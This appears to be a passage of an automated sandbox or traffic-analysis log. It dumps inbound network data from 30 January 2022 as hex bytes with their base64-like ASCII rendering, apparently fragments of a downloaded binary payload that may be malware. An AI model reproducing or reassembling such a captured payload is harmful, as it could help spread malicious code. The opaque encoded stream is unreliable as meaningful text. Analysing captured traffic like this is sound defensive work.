2022-01-30 12:33:36 UTC	951	IN	Data Raw: 32 76 61 38 79 34 38 78 52 55 6a 50 4a 69 31 58 38 67 38 67 45 69 51 71 47 53 67 53 4c 0d 0a 4b 4b 54 77 67 57 78 69 33 41 4e 66 77 63 45 45 55 65 68 74 78 77 67 41 67 38 51 48 69 31 58 38 71 6c 71 6e 4a 57 34 69 33 41 75 72 79 55 30 49 69 31 45 4d 69 56 6f 4d 69 30 58 7a 67 38 41 51 0d 0a 35 42 32 4c 79 69 58 4b 6b 45 2f 6a 77 41 59 51 4d 39 4b 4c 52 66 4b 44 77 41 53 47 45 49 6c 51 61 64 4d 2b 75 65 76 7a 55 78 2f 63 46 77 69 44 77 68 52 53 36 43 6e 48 41 67 43 4d 78 41 69 4c 0d 0a 4b 4b 43 30 51 55 53 78 55 56 37 63 42 2f 79 4c 35 56 33 43 42 41 72 4d 7a 4d 7a 44 7a 4d 7a 4d 6f 5a 53 2f 6a 61 54 2b 6d 34 49 43 79 65 78 52 69 55 33 38 69 30 2f 38 78 77 43 37 67 67 59 51 0d 0a 58 70 48 34 46 4a 53 78 6c 55 72 65 53 49 6c 4b 42 49 74 46 2f 49 6e 41 42 46 Data Ascii: 2va8y48xRUjPJi1X8g8gEiQqGSgSLKKTwgWxi3ANfwcEEUehtxwgAg8QHi1X8qlqnJW4i3AuryU0Ii1EMiVoMi0Xzg8AQ5B2LyiXKkE/jwAYQM9KLRfKDwASGEIlQadM+uevzUx/cFwiDwhRS6CnHAgCMxAiLKKC0QUSxUV7cB/yL5V3CBArMzMzDzMzMoZS/jaT+m4ICyexRiU38i0/8xwC7ggYQXpH4FJSxlUreSIlKBItF/InABF
2022-01-30 12:33:36 UTC	967	IN	Data Raw: 47 52 65 2b 39 78 6b 58 70 43 73 5a 46 0d 0a 69 70 61 31 42 49 41 35 6b 51 75 2b 4e 73 5a 46 36 74 2f 47 52 65 47 75 78 6b 58 6a 4e 4d 5a 46 67 4d 75 31 42 49 5a 5a 39 75 72 2f 52 52 43 44 34 41 45 50 68 59 49 41 41 41 43 45 44 61 53 6f 0d 0a 61 6b 6a 77 69 47 6d 37 57 75 72 2f 52 52 44 47 42 61 4f 6f 42 78 6f 42 44 31 66 50 5a 67 38 54 4b 4b 69 59 55 2b 4e 6e 70 38 32 56 51 34 74 46 39 49 50 51 41 49 4e 56 38 49 6c 4b 39 49 4e 39 0d 0a 6d 56 67 45 41 68 6f 30 31 44 4f 6e 54 58 4d 37 61 67 42 71 41 59 46 4e 39 46 47 45 56 66 42 53 68 57 76 36 51 32 69 35 70 2f 5a 57 51 67 41 41 61 38 67 41 6a 58 59 4e 34 47 6f 50 61 67 47 4c 0d 0a 4f 4b 77 68 79 69 33 43 42 36 5a 44 79 77 49 41 69 67 77 33 69 49 4b 55 71 41 63 66 36 36 56 6f 48 58 5a 31 55 59 44 55 33 30 Data Ascii: GRe+9xkXpCsZFipa1BIA5kQu+NsZF6t/GReGuxkXjNMZFgMu1BIZZ9ur/RRCD4AEPhYIAAACEDaSoakjwiGm7Wur/RRDGBaOoBxoBD1fPZg8TKKiYU+Nnp82VQ4tF9IPQAINV8IlK9IN9mVgEAho01DOnTXM7agBqAYFN9FGEVfBShWv6Q2i5p/ZWQgAAa8gAjXYN4GoPagGLOKwhyi3CB6ZDywIAigw3iIKUqAcf66VoHXZ1UYDU30
2022-01-30 12:33:36 UTC	983	IN	Data Raw: 4c 51 6a 71 55 42 70 56 55 37 64 54 6a 65 49 69 4a 43 6d 42 78 72 72 70 57 6a 50 50 51 59 51 68 61 49 70 51 32 69 78 6b 30 72 76 30 71 59 48 45 46 39 65 69 2b 39 64 77 38 7a 44 7a 4d 7a 4d 0d 0a 4f 4e 4f 66 77 6f 52 79 41 52 6e 65 44 2f 7a 48 52 66 67 76 41 41 6f 41 78 6b 58 50 43 63 5a 46 72 42 69 31 42 4b 6f 44 6b 51 75 55 50 63 5a 46 78 4c 4c 47 52 63 38 5a 78 6b 58 4a 45 73 5a 46 0d 0a 71 6b 4f 31 42 4b 41 4e 6b 51 75 65 47 38 5a 46 79 6a 50 47 52 63 45 78 78 6b 58 44 73 73 5a 46 6f 45 47 31 42 4b 5a 6e 6b 51 75 59 46 4d 5a 46 30 44 37 47 52 64 74 59 78 6b 58 64 4d 4d 5a 46 0d 0a 76 6a 75 31 42 4c 79 51 6b 51 75 43 46 63 5a 46 31 6c 62 47 52 64 30 49 78 6b 58 58 65 38 5a 46 74 45 57 31 42 4c 49 70 6b 51 75 4d 50 38 5a 46 33 4c 66 47 52 64 63 2b 78 6b Data Ascii: LQjqUBpVU7dTjeIiJCmBxrrpWjPPQYQhaIpQ2ixk0rv0qYHEF9ei+9dw8zDzMzMONOfwoRyARneD/zHRfgvAAoAxkXPCcZFrBi1BKoDkQuUPcZFxLLGRc8ZxkXJEsZFqkO1BKANkQueG8ZFyjPGRcExxkXDssZFoEG1BKZnkQuYFMZF0D7GRdtYxkXdMMZFvju1BLyQkQuCFcZF1lbGRd0IxkXXe8ZFtEW1BLIpkQuMP8ZF3LfGRdc+xk
2022-01-30 12:33:36 UTC	999	IN	Data Raw: 6e 50 47 52 65 6e 6b 78 6b 58 72 79 4d 5a 46 69 4b 69 31 42 49 36 4f 6b 51 75 77 74 38 5a 46 36 4a 50 47 52 65 50 75 78 6b 58 6c 63 63 5a 46 0d 0a 68 76 4f 31 42 49 54 2b 6b 51 75 36 75 4d 5a 46 37 72 6a 47 52 65 57 62 6f 65 69 51 42 78 43 44 6a 56 6c 38 78 4f 41 79 56 30 37 63 54 2b 69 66 42 78 43 44 79 51 75 4a 44 65 69 51 42 78 44 47 0d 0a 61 4c 7a 73 52 6e 67 7a 57 42 6d 58 4a 41 38 54 52 66 44 72 45 6f 46 56 38 49 50 4e 41 59 74 46 6d 64 75 6a 51 65 46 6e 70 38 63 53 74 6f 4e 39 39 41 42 33 51 33 67 47 67 33 33 2f 45 48 4d 37 0d 0a 42 31 67 5a 51 4f 4e 2f 6f 78 2f 63 46 2f 42 53 36 41 38 73 41 67 71 4c 38 4c 67 4f 41 41 41 41 42 70 42 7a 7a 42 51 2f 74 79 52 58 4b 41 47 4c 56 66 52 53 69 30 2f 77 55 4f 6a 2f 4b 77 49 41 0d 0a 35 31 52 45 79 65 44 6d Data Ascii: nPGRenkxkXryMZFiKi1BI6OkQuwt8ZF6JPGRePuxkXlccZFhvO1BIT+kQu6uMZF7rjGReWboeiQBxCDjVl8xOAyV07cT+ifBxCDyQuJDeiQBxDGaLzsRngzWBmXJA8TRfDrEoFV8IPNAYtFmdujQeFnp8cStoN99AB3Q3gGg33/EHM7B1gZQON/ox/cF/BS6A8sAgqL8LgOAAAABpBzzBQ/tyRXKAGLVfRSi0/wUOj/KwIA51REyeDm
2022-01-30 12:33:36 UTC	1015	IN	Data Raw: 78 7a 34 46 4a 52 67 76 35 32 74 51 77 43 44 78 41 69 4c 52 66 61 4c 35 56 33 4e 42 41 44 4d 0d 0a 4f 4e 4f 66 4b 35 64 61 39 30 6c 52 55 6d 53 68 41 41 41 41 41 46 70 6b 69 53 55 50 41 41 41 41 37 72 52 2f 79 43 58 65 33 41 75 37 77 65 68 6f 69 55 58 6f 69 30 66 6f 67 38 46 6e 36 4b 35 55 0d 0a 6b 71 66 34 44 49 43 78 6c 69 62 65 44 2f 43 4c 56 66 44 48 41 6c 70 6c 42 68 44 49 52 66 77 41 62 56 68 7a 79 69 33 43 6b 45 34 58 4a 67 59 51 69 30 33 77 55 65 4b 51 39 51 45 50 67 38 51 45 0d 0a 71 68 32 50 76 70 66 4e 71 4d 55 43 53 6f 50 69 41 58 51 55 61 4c 6f 41 41 41 43 45 52 65 79 44 68 54 41 6a 71 53 37 49 56 6b 37 55 68 67 69 4c 52 65 79 44 36 47 4b 4c 54 66 52 72 69 51 30 41 0d 0a 62 56 68 7a 79 6f 31 76 6c 55 70 58 6a 73 7a 4d 7a 4d 7a 4d 7a 46 2b 4c Data Ascii: xz4FJRgv52tQwCDxAiLRfaL5V3NBADMONOfK5da90lRUmShAAAAAFpkiSUPAAAA7rR/yCXe3Au7wehoiUXoi0fog8Fn6K5Ukqf4DICxlibeD/CLVfDHAlplBhDIRfwAbVhzyi3CkE4XJgYQi03wUeKQ9QEPg8QEqh2PvpfNqMUCSoPiAXQUaLoAAACEReyDhTAjqS7IVk7UhgiLReyD6GKLTfRriQ0AbVhzyo1vlUpXjszMzMzMzF+L
2022-01-30 12:33:36 UTC	1031	IN	Data Raw: 51 45 41 69 59 2f 30 2b 66 2f 77 6a 59 31 49 0d 0a 6d 4b 65 4d 71 63 41 58 71 4c 48 63 56 79 43 66 42 78 42 53 6f 54 61 66 42 78 42 66 6a 55 33 6b 68 56 75 51 76 4a 64 69 76 35 4f 49 76 2f 38 50 74 73 69 46 79 51 57 45 6c 77 49 50 41 49 50 73 0d 0a 64 64 4f 6e 79 4d 33 43 72 72 47 6f 45 4b 48 4d 6e 67 63 51 55 49 64 4e 35 4f 6a 58 34 76 33 2f 35 70 43 62 45 49 7a 50 71 4b 5a 62 55 67 41 41 69 45 58 4e 69 6b 66 4e 69 45 33 44 44 37 5a 56 0d 0a 6f 64 32 68 54 75 77 44 56 6b 35 58 4b 41 43 44 37 42 69 4c 78 49 4f 6c 37 50 6e 77 2f 31 43 4c 59 44 7a 73 52 6e 68 6a 32 67 4f 7a 71 70 72 69 2f 66 2b 4c 79 4f 49 54 35 50 33 77 69 59 58 6f 0d 0a 6c 4b 65 4d 68 79 33 4f 49 38 32 37 57 6f 76 4d 69 61 58 6b 2b 66 58 2f 6a 56 57 72 55 75 69 31 6d 71 61 4d 79 4f 33 53 Data Ascii: QEAiY/0+f/wjY1ImKeMqcAXqLHcVyCfBxBSoTafBxBfjU3khVuQvJdiv5OIv/8PtsiFyQWElwIPAIPsddOnyM3CrrGoEKHMngcQUIdN5OjX4v3/5pCbEIzPqKZbUgAAiEXNikfNiE3DD7ZVod2hTuwDVk5XKACD7BiLxIOl7Pnw/1CLYDzsRnhj2gOzqpri/f+LyOIT5P3wiYXolKeMhy3OI827WovMiaXk+fX/jVWrUui1mqaMyO3S
2022-01-30 12:33:36 UTC	1047	IN	Data Raw: 0a 71 56 7a 36 42 4c 44 30 45 72 4a 56 7a 34 30 59 2f 76 2f 2f 36 47 59 41 2f 2f 2b 43 68 65 54 39 6b 71 63 6a 79 69 58 71 33 46 2f 63 44 39 69 4c 51 68 54 2f 30 49 46 4e 33 49 50 47 42 49 6c 4e 0d 0a 73 5a 34 32 76 57 79 35 41 70 62 63 51 49 74 4e 32 49 74 51 45 50 58 53 69 45 58 6b 69 30 58 49 56 68 31 58 54 75 79 39 56 30 35 58 79 55 33 59 69 78 47 4c 54 64 4b 4c 51 67 7a 77 30 49 68 46 0d 0a 67 4e 58 2b 61 5a 62 4e 71 4d 63 61 2f 6f 74 56 76 49 6d 56 58 50 58 2f 2f 34 74 4b 76 49 4e 34 65 55 67 42 54 61 2b 33 4e 37 47 6f 76 51 45 41 41 41 44 72 43 73 32 46 59 50 2f 77 2f 77 41 41 0d 0a 62 56 6a 35 7a 41 6a 4e 71 4c 48 66 44 2b 34 50 74 6c 58 75 68 64 68 30 46 34 74 4b 76 49 73 49 35 4e 57 48 76 35 66 4e 33 4e 75 6a 76 50 2f 2f 69 5a 56 63 2f 2f 58 2f Data Ascii: qVz6BLD0ErJVz40Y/v//6GYA//+CheT9kqcjyiXq3F/cD9iLQhT/0IFN3IPGBIlNsZ42vWy5ApbcQItN2ItQEPXSiEXki0XIVh1XTuy9V05XyU3YixGLTdKLQgzw0IhFgNX+aZbNqMca/otVvImVXPX//4tKvIN4eUgBTa+3N7GovQEAAADrCs2FYP/w/wAAbVj5zAjNqLHfD+4PtlXuhdh0F4tKvIsI5NWHv5fN3NujvP//iZVc//X/
2022-01-30 12:33:36 UTC	1063	IN	Data Raw: 68 41 41 41 41 41 46 70 6b 69 53 55 50 41 41 41 41 37 72 52 50 79 43 58 61 33 41 75 2f 79 30 58 73 69 30 33 73 69 55 66 77 69 31 58 6a 67 38 49 45 0d 0a 35 41 32 76 79 69 33 65 31 49 35 66 79 30 58 59 69 30 33 77 67 7a 4d 41 44 34 53 52 41 41 41 41 35 67 32 76 79 6d 71 37 45 6f 72 63 44 2f 43 4c 45 59 6c 56 77 49 46 46 36 49 6c 4b 31 49 74 4e 0d 0a 75 64 45 2b 2f 65 4e 6e 76 38 63 43 6b 6f 74 46 30 49 6c 46 75 49 46 4e 32 49 74 61 38 49 73 42 52 6c 71 79 75 57 71 37 45 6f 4c 63 44 2f 43 4c 45 59 6c 56 79 49 46 46 7a 4d 48 76 41 6f 6c 46 0d 0a 69 64 4d 2b 69 65 46 2f 74 34 6b 53 76 67 41 41 41 41 43 42 66 65 34 41 45 41 41 50 63 67 32 4e 4f 4c 77 68 7a 43 33 53 42 36 59 62 2b 50 2f 2f 69 30 33 6b 55 59 46 56 34 46 4c 6e 68 57 34 42 0d 0a 62 64 75 33 53 61 Data Ascii: hAAAAAFpkiSUPAAAA7rRPyCXa3Au/y0Xsi03siUfwi1Xjg8IE5A2vyi3e1I5fy0XYi03wgzMAD4SRAAAA5g2vymq7EorcD/CLEYlVwIFF6IlK1ItNudE+/eNnv8cCkotF0IlFuIFN2Ita8IsBRlqyuWq7EoLcD/CLEYlVyIFFzMHvAolFidM+ieF/t4kSvgAAAACBfe4AEAAPcg2NOLwhzC3SB6Yb+P//i03kUYFV4FLnhW4Bbdu3Sa
2022-01-30 12:33:36 UTC	1079	IN	Data Raw: 6f 6a 67 75 30 45 41 49 79 50 55 54 63 46 2f 78 53 36 41 66 6e 2f 2f 57 4c 52 66 7a 4a 51 41 6f 41 0d 0a 35 72 30 75 67 71 54 2b 6d 34 4b 62 6a 73 7a 4d 7a 4d 7a 4d 7a 46 2b 4c 37 46 47 47 54 66 79 4c 4b 4b 52 38 39 79 41 6a 30 6f 63 6a 58 47 69 56 79 7a 63 68 61 4a 39 44 59 2f 39 6c 41 47 6f 52 0d 0a 35 67 32 50 45 34 44 31 73 62 47 6f 79 55 58 38 78 6b 41 52 41 49 48 6c 58 63 50 44 7a 4d 7a 4d 6f 5a 53 2f 6a 61 54 2b 6d 34 49 43 79 65 78 52 69 55 33 38 69 30 2f 38 44 37 5a 48 45 59 58 4a 0d 0a 47 55 59 62 68 4d 30 4e 64 69 5a 43 6c 5a 73 46 61 67 42 71 45 59 46 56 2f 46 4c 6e 68 2b 62 2f 6b 74 4d 32 76 61 35 79 52 6b 37 63 70 31 33 44 7a 4d 7a 4d 7a 4d 62 4d 7a 4d 7a 44 7a 4d 7a 4d 0d 0a 4f 4e 4f 66 45 4f 46 2f 71 38 55 53 76 67 2b 32 53 42 4b 46 79 58 Data Ascii: ojgu0EAIyPUTcF/xS6Afn//WLRfzJQAoA5r0ugqT+m4KbjszMzMzMzF+L7FGGTfyLKKR89yAj0ocjXGiVyzchaJ9DY/9lAGoR5g2PE4D1sbGoyUX8xkARAIHlXcPDzMzMoZS/jaT+m4ICyexRiU38i0/8D7ZHEYXJGUYbhM0NdiZClZsFagBqEYFV/FLnh+b/ktM2va5yRk7cp13DzMzMzMbMzMzDzMzMONOfEOF/q8USvg+2SBKFyX
2022-01-30 12:33:36 UTC	1095	IN	Data Raw: 6c 41 41 41 41 41 4c 4b 34 4a 41 41 50 36 4c 34 57 0d 0a 62 46 69 30 42 4a 51 79 56 30 35 58 7a 30 55 49 69 55 58 67 69 30 66 67 69 55 33 58 69 31 58 67 37 69 4a 6e 55 52 6f 37 6b 41 75 4c 51 77 41 41 41 4f 73 48 78 30 2f 63 41 41 41 50 41 49 70 46 0d 0a 73 64 41 32 73 6d 65 45 47 72 33 53 69 33 51 4f 69 31 58 67 69 77 69 4a 52 62 69 45 54 62 69 4a 49 49 44 34 46 4c 43 37 41 76 72 63 42 37 53 4a 52 62 42 71 52 47 41 41 6a 59 31 44 2f 2f 2f 2f 0d 0a 50 4c 43 5a 35 70 66 4e 50 56 34 39 51 6f 31 56 6b 46 4c 6f 33 61 33 2f 2f 7a 50 50 69 45 58 79 34 42 57 42 71 53 69 58 71 62 48 65 42 39 53 4c 54 64 54 6f 78 64 4c 2f 2f 32 67 50 49 41 41 41 0d 0a 34 4e 56 50 6d 70 66 4e 42 73 55 43 6c 6c 4a 71 41 47 67 6f 63 41 77 51 36 48 6e 78 2f 66 2f 2f 76 57 75 7a 79 53 Data Ascii: lAAAAALK4JAAP6L4WbFi0BJQyV05Xz0UIiUXgi0fgiU3Xi1Xg7iJnURo7kAuLQwAAAOsHx0/cAAAPAIpFsdA2smeEGr3Si3QOi1XgiwiJRbiETbiJIID4FLC7AvrcB7SJRbBqRGAAjY1D////PLCZ5pfNPV49Qo1VkFLo3a3//zPPiEXy4BWBqSiXqbHeB9SLTdToxdL//2gPIAAA4NVPmpfNBsUCllJqAGgocAwQ6Hnx/f//vWuzyS
2022-01-30 12:33:36 UTC	1111	IN	Data Raw: 4e 0d 0a 6d 54 7a 36 54 47 67 79 56 30 37 63 70 31 33 43 43 41 42 6d 6b 46 45 75 41 78 43 35 4c 67 4d 51 65 6e 64 77 55 52 41 64 56 46 36 4f 62 51 4d 51 4f 6a 41 44 45 4a 45 77 41 78 44 7a 4d 41 4d 51 0d 0a 62 56 6c 78 52 6d 73 32 55 45 6c 51 52 51 63 48 42 77 63 48 42 77 30 48 42 77 63 49 42 77 63 48 61 6c 39 32 52 6d 38 31 55 45 6c 51 52 51 63 48 42 77 63 48 42 77 30 48 42 77 63 49 42 77 63 48 0d 0a 61 6c 39 30 52 6d 38 31 55 45 6c 51 52 51 63 48 42 77 63 48 42 77 30 48 42 77 63 49 42 77 63 48 61 6c 39 30 52 6d 38 31 55 45 6c 51 52 51 63 48 42 73 7a 4d 7a 4d 62 4d 7a 4d 7a 44 7a 4d 7a 4d 0d 0a 4f 4e 4f 66 77 6f 51 71 33 67 4f 6e 77 65 77 49 33 55 55 49 33 52 59 6b 36 4e 6b 6e 41 51 43 44 71 56 44 72 78 4b 68 4e 58 6f 6b 53 74 67 45 41 41 41 44 72 42 38 Data Ascii: NmTz6TGgyV07cp13CCABmkFEuAxC5LgMQendwURAdVF6ObQMQOjADEJEwAxDzMAMQbVlxRms2UElQRQcHBwcHBw0HBwcIBwcHal92Rm81UElQRQcHBwcHBw0HBwcIBwcHal90Rm81UElQRQcHBwcHBw0HBwcIBwcHal90Rm81UElQRQcHBszMzMbMzMzDzMzMONOfwoQq3gOnwewI3UUI3RYk6NknAQCDqVDrxKhNXokStgEAAADrB8
2022-01-30 12:33:36 UTC	1127	IN	Data Raw: 6f 6c 4e 31 49 74 56 31 46 69 4e 6a 59 54 30 2f 2f 2f 6f 61 65 43 50 76 75 57 33 30 37 57 6f 76 59 6d 46 6c 50 76 2f 2f 38 79 46 6d 50 76 77 2f 77 48 47 0d 0a 4b 4b 52 35 7a 4f 56 65 72 4c 47 6f 79 34 30 30 2f 2f 2f 2f 6a 5a 2b 63 2b 2f 2f 77 69 5a 55 34 6b 71 65 4d 79 75 30 47 71 4c 47 6f 79 59 30 34 2f 2f 2f 2f 69 59 38 73 2f 2f 2f 77 69 59 30 77 0d 0a 6b 71 65 4d 4b 32 70 59 56 73 58 43 63 76 2f 2f 2f 31 4b 4c 68 53 62 2f 2f 2f 39 66 6a 59 32 77 6c 4b 65 4d 71 59 6a 75 71 72 48 61 7a 37 44 35 2f 2f 2b 4a 6a 63 72 35 2f 2f 2f 4a 68 63 54 35 0d 0a 6b 71 64 79 68 79 33 4f 58 49 6b 53 6b 74 69 65 42 78 43 4c 56 64 70 53 6a 59 32 76 2b 2f 2f 2f 68 63 76 46 76 5a 65 2f 30 75 36 73 76 66 2b 4a 68 62 44 37 2f 2f 58 47 68 62 54 30 2f 2f 38 42 0d 0a 71 78 32 50 Data Ascii: olN1ItV1FiNjYT0///oaeCPvuW307WovYmFlPv//8yFmPvw/wHGKKR5zOVerLGoy400////jZ+c+//wiZU4kqeMyu0GqLGoyY04////iY8s///wiY0wkqeMK2pYVsXCcv///1KLhSb///9fjY2wlKeMqYjuqrHaz7D5//+Jjcr5///JhcT5kqdyhy3OXIkSktieBxCLVdpSjY2v+///hcvFvZe/0u6svf+JhbD7//XGhbT0//8Bqx2P
2022-01-30 12:33:36 UTC	1143	IN	Data Raw: 76 2f 2f 35 74 31 6e 76 35 66 4e 33 4d 4e 50 76 50 2f 2f 69 59 55 4d 2f 76 58 2f 69 59 30 66 2f 76 2f 2f 0d 0a 42 31 6f 5a 51 4f 4f 6e 52 37 43 6f 76 56 4b 4c 68 51 7a 2b 2f 2f 56 51 6a 59 30 62 2b 76 2f 2f 68 63 76 64 76 4a 65 2f 32 6c 71 74 76 66 2b 4a 6a 53 54 36 2f 2f 58 47 68 53 6a 31 2f 2f 38 42 0d 0a 71 78 32 50 55 71 2b 33 57 37 47 6f 76 64 69 65 42 78 43 4c 6c 51 62 2f 2f 2f 39 64 6a 59 30 6f 6c 71 65 4d 71 53 69 36 71 37 48 61 78 79 6a 37 2f 2f 2b 4a 68 54 4c 37 2f 2f 2f 4a 68 54 7a 37 0d 0a 6b 71 64 79 68 79 33 4f 51 38 32 37 57 6f 76 4d 69 61 56 77 2f 50 58 2f 69 55 32 58 6a 56 56 4d 35 4d 31 37 76 70 66 4e 33 4d 74 66 76 66 2f 2f 69 59 56 73 2f 50 58 2f 6a 55 33 54 55 51 2b 32 0d 0a 4f 49 4d 68 79 69 57 71 76 78 76 47 76 76 2f 47 52 66 77 56 Data Ascii: v//5t1nv5fN3MNPvP//iYUM/vX/iY0f/v//B1oZQOOnR7CovVKLhQz+//VQjY0b+v//hcvdvJe/2lqtvf+JjST6//XGhSj1//8Bqx2PUq+3W7GovdieBxCLlQb///9djY0olqeMqSi6q7Haxyj7//+JhTL7///JhTz7kqdyhy3OQ827WovMiaVw/PX/iU2XjVVM5M17vpfN3Mtfvf//iYVs/PX/jU3TUQ+2OIMhyiWqvxvGvv/GRfwV
2022-01-30 12:33:36 UTC	1159	IN	Data Raw: 55 32 38 55 59 32 56 56 50 62 2f 2f 31 4a 6c 41 47 67 4d 0d 0a 48 56 35 6a 71 53 41 4f 71 72 47 6f 6b 6d 6f 42 6a 59 30 34 2f 76 58 2f 36 4a 6d 66 2f 66 2f 47 4b 4b 52 33 63 71 69 36 45 71 54 61 44 2b 72 6f 32 44 4c 2b 2f 34 4e 46 75 49 74 43 75 4f 68 74 0d 0a 66 61 65 4d 79 69 57 4b 42 73 58 43 4f 76 2f 2f 2f 31 4b 4e 52 53 35 51 69 34 31 37 2f 2f 2f 2f 50 4e 58 6d 43 5a 62 4e 71 42 79 2f 69 57 62 38 2f 31 44 6f 52 57 7a 38 2f 31 44 6e 76 32 62 38 0d 0a 6b 67 69 62 2b 41 37 4f 71 48 32 58 79 6b 58 70 6a 55 33 70 36 42 59 6c 2f 76 2b 47 52 62 53 4c 49 4f 79 62 59 47 66 4e 71 4d 55 61 39 6c 47 4e 6c 56 54 38 2f 2f 56 53 6a 59 56 48 2f 76 2f 2f 0d 0a 50 62 44 35 4a 35 54 4e 42 36 62 54 4a 50 7a 2f 4d 38 6d 49 54 65 4b 4e 54 65 6a 6e 6c 2f 44 39 6b 74 45 32 Data Ascii: U28UY2VVPb//1JlAGgMHV5jqSAOqrGokmoBjY04/vX/6Jmf/f/GKKR3cqi6EqTaD+ro2DL+/4NFuItCuOhtfaeMyiWKBsXCOv///1KNRS5Qi417////PNXmCZbNqBy/iWb8/1DoRWz8/1Dnv2b8kgib+A7OqH2XykXpjU3p6BYl/v+GRbSLIOybYGfNqMUa9lGNlVT8//VSjYVH/v//PbD5J5TNB6bTJPz/M8mITeKNTejnl/D9ktE2
2022-01-30 12:33:36 UTC	1175	IN	Data Raw: 67 59 51 0d 0a 68 53 32 62 51 57 69 78 6b 30 4c 63 46 2f 79 4c 41 6f 6f 49 69 45 66 34 67 48 33 33 41 41 2b 45 37 56 68 7a 51 65 68 50 72 30 38 6a 53 6f 42 39 2b 41 4a 30 50 4f 46 2b 69 31 58 7a 69 77 4b 4c 0d 0a 4a 56 44 36 44 4a 69 35 41 72 37 65 46 2b 79 4c 52 65 79 4a 52 65 4b 4c 54 65 69 45 45 59 73 43 35 42 32 58 79 69 58 57 33 67 4f 33 7a 31 58 67 69 56 58 63 69 30 2f 63 69 77 69 45 56 66 79 4a 0d 0a 4a 31 79 59 44 2b 4e 33 71 38 56 66 79 56 45 49 69 56 58 59 69 30 2f 59 69 55 58 37 69 30 33 30 35 42 57 37 79 6a 33 47 33 45 7a 65 42 39 53 4c 54 64 53 4a 54 64 71 4e 56 64 43 47 56 63 79 4c 0d 0a 4b 4a 54 34 53 65 4e 6e 71 38 63 64 53 75 73 57 69 30 58 38 78 30 6f 4d 41 51 41 50 41 4f 73 4b 35 68 57 50 68 69 6b 2b 56 30 35 58 51 6f 76 6c 58 63 50 4d Data Ascii: gYQhS2bQWixk0LcF/yLAooIiEf4gH33AA+E7VhzQehPr08jSoB9+AJ0POF+i1XziwKLJVD6DJi5Ar7eF+yLReyJReKLTeiEEYsC5B2XyiXW3gO3z1XgiVXci0/ciwiEVfyJJ1yYD+N3q8VfyVEIiVXYi0/YiUX7i0305BW7yj3G3EzeB9SLTdSJTdqNVdCGVcyLKJT4SeNnq8cdSusWi0X8x0oMAQAPAOsK5hWPhik+V05XQovlXcPM
2022-01-30 12:33:36 UTC	1191	IN	Data Raw: 58 30 77 59 51 38 67 39 59 77 63 6e 4d 7a 4d 7a 44 7a 4d 7a 4d 6f 5a 53 2f 6a 61 54 2b 6d 34 4c 55 66 35 79 74 42 78 41 47 66 42 76 46 2b 57 37 4f 78 4f 4e 35 0d 0a 54 35 70 79 49 35 6e 4d 58 36 69 58 67 51 39 58 79 66 49 50 4b 73 41 50 56 38 44 39 44 79 72 42 72 4c 46 73 73 32 64 72 57 6b 37 47 52 42 44 79 44 31 67 45 7a 66 4b 51 42 68 44 39 44 31 6a 42 0d 0a 72 67 33 34 72 5a 35 33 58 30 38 42 79 66 48 48 42 67 79 52 42 68 70 30 43 6d 6f 44 56 75 68 72 6c 36 65 4d 47 44 47 35 6b 52 41 4b 67 41 51 41 56 59 76 73 69 30 38 4d 67 2b 67 50 64 44 4f 44 0d 0a 68 56 6b 48 59 65 76 61 56 6a 70 47 77 65 67 42 64 41 55 7a 77 45 72 72 4d 4f 67 6e 2b 2f 2f 2f 68 6c 32 62 51 35 50 4e 71 45 48 68 67 75 73 66 2f 33 55 51 2f 33 38 49 36 42 67 50 41 41 42 5a 0d 0a 68 6b Data Ascii: X0wYQ8g9YwcnMzMzDzMzMoZS/jaT+m4LUf5ytBxAGfBvF+W7OxON5T5pyI5nMX6iXgQ9XyfIPKsAPV8D9DyrBrLFss2drWk7GRBDyD1gEzfKQBhD9D1jBrg34rZ53X08ByfHHBgyRBhp0CmoDVuhrl6eMGDG5kRAKgAQAVYvsi08Mg+gPdDODhVkHYevaVjpGwegBdAUzwErrMOgn+///hl2bQ5PNqEHhgusf/3UQ/38I6BgPAABZhk
2022-01-30 12:33:36 UTC	1207	IN	Data Raw: 4b 77 48 55 43 35 70 2b 4d 4e 47 42 69 76 2b 4f 32 76 66 2b 4c 64 53 54 2f 4e 76 56 31 47 50 39 36 46 46 66 6f 0d 0a 44 31 46 7a 51 65 4e 30 55 77 34 48 76 58 55 59 56 2b 69 7a 44 77 6f 41 61 41 41 4f 41 41 44 2f 47 48 43 4d 4d 6d 54 4e 49 6c 61 6f 4e 78 42 58 2f 33 55 49 36 4e 38 47 41 41 43 4d 78 44 69 46 0d 0a 72 53 78 30 46 6a 6a 61 59 61 2b 6f 76 56 39 65 57 31 33 44 56 59 48 73 67 2b 78 72 55 31 5a 58 35 69 56 72 63 71 68 6c 71 44 74 44 79 30 58 77 2f 33 55 4d 69 45 2f 6f 36 45 6b 41 41 41 43 4c 0d 0a 70 64 75 33 54 65 46 2f 72 38 32 75 76 51 2b 4d 63 77 4d 41 41 44 46 50 42 41 2b 43 61 67 4d 41 62 64 4d 75 53 65 6b 4a 4e 44 30 36 6f 67 2b 46 39 77 41 41 41 49 6c 37 45 41 4d 41 68 65 30 41 0d 0a 62 56 6a 79 4f 6e 77 53 55 74 31 4f 4e 68 61 42 65 78 Data Ascii: KwHUC5p+MNGBiv+O2vf+LdST/NvV1GP96FFfoD1FzQeN0Uw4HvXUYV+izDwoAaAAOAAD/GHCMMmTNIlaoNxBX/3UI6N8GAACMxDiFrSx0FjjaYa+ovV9eW13DVYHsg+xrU1ZX5iVrcqhlqDtDy0Xw/3UMiE/o6EkAAACLpdu3TeF/r82uvQ+McwMAADFPBA+CagMAbdMuSekJND06og+F9wAAAIl7EAMAhe0AbVjyOnwSUt1ONhaBex
2022-01-30 12:33:36 UTC	1223	IN	Data Raw: 6f 76 51 2b 46 61 66 7a 2f 2f 34 47 4e 31 50 62 77 2f 34 58 4a 0d 0a 47 52 33 34 66 65 55 32 38 45 68 48 78 2f 38 50 68 59 67 41 41 41 6f 7a 77 46 43 47 68 64 54 30 6b 71 66 36 78 45 54 4d 71 4c 48 61 78 39 6a 30 2f 2f 39 51 6a 59 38 77 2f 76 2f 77 61 4d 77 42 0d 0a 62 56 67 6a 71 58 63 71 56 30 37 55 68 68 43 4c 6e 53 7a 2b 2f 2f 57 4a 6e 65 6a 35 2f 2f 2b 46 74 6c 66 32 72 57 67 79 56 33 32 65 71 77 55 42 41 41 41 7a 77 46 71 4a 68 64 54 37 2f 2f 2b 4a 0d 0a 36 48 53 4e 76 70 65 2f 30 70 61 6a 76 66 39 51 6a 59 55 77 2f 76 58 2f 61 4d 77 4f 41 41 42 51 68 59 4a 6b 51 57 69 78 6b 31 35 6c 67 75 6c 46 2f 2f 2f 2f 67 36 2f 55 